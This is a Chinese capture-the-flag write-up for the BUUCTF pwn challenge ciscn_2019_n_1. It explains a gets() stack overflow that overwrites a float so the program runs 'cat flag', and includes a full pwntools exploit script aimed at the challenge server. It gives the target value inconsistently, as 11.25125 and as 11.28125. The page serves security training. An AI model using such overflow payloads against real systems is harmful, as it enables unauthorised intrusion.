C/C++教程
BUUCTF PWN ciscn_2019_n_1
本文主要是介绍BUUCTF PWN ciscn_2019_n_1,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
拿到文件先checksec
仅开启了NX保护
放入IDA中
查看main函数很简单,没有什么明显漏洞
发现了func函数,双击试试看
可以看到只要v2等于11.25125就可以执行cat flag命令
先把11.28125转为16进制,放着备用(0x41348000)
我们的思路就是利用gets这个危险函数,通过覆盖v1的地址来修改v2的值,进而执行system命令,拿到flag。
写脚本
from pwn import *
p=remote('node4.buuoj.cn',25989)
payload='a'*0x2c+p64(0x41348000)
p.recvuntil("Let's guess the number.")
p.sendline(payload)
p.interactive()
运行试试
拿到flag!
这篇关于BUUCTF PWN ciscn_2019_n_1的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
在使用平台私钥进行解密时提示 "私钥解密失败" 错误信息是什么原因?-icode9专业技术文章分享11-15
-
Layui框架有哪些方式引入?-icode9专业技术文章分享11-15
-
Layui框架中有哪些减少对全局环境的污染方法?-icode9专业技术文章分享11-15
-
laydate怎么关闭自动的日期格式校验功能?-icode9专业技术文章分享11-15
-
laydate怎么取消初始日期校验?-icode9专业技术文章分享11-15
-
SendGrid 的邮件发送时,怎么设置回复邮箱?-icode9专业技术文章分享11-15
-
使用 SendGrid API 发送邮件后获取到唯一的请求 ID?-icode9专业技术文章分享11-15
-
mailgun 发送邮件 tags标签最多有多少个?-icode9专业技术文章分享11-15
-
mailgun 发送邮件 怎么批量发送给多个人?-icode9专业技术文章分享11-15
-
如何搭建web开发环境并实现 web项目在浏览器中访问?-icode9专业技术文章分享11-15
-
rabbitmq 消息没有回应任何ack之类的,默认是丢掉吗?-icode9专业技术文章分享11-15
-
webp图片怎么添加水印吗?-icode9专业技术文章分享11-15
-
laravel 在模板页怎么存和取cookie?-icode9专业技术文章分享11-15
-
在 Laravel 中的Blade 模板模板页怎么使用cookie?-icode9专业技术文章分享11-15
-
uniapp中实现图片的缓存功能有哪些方法?-icode9专业技术文章分享11-15
栏目导航
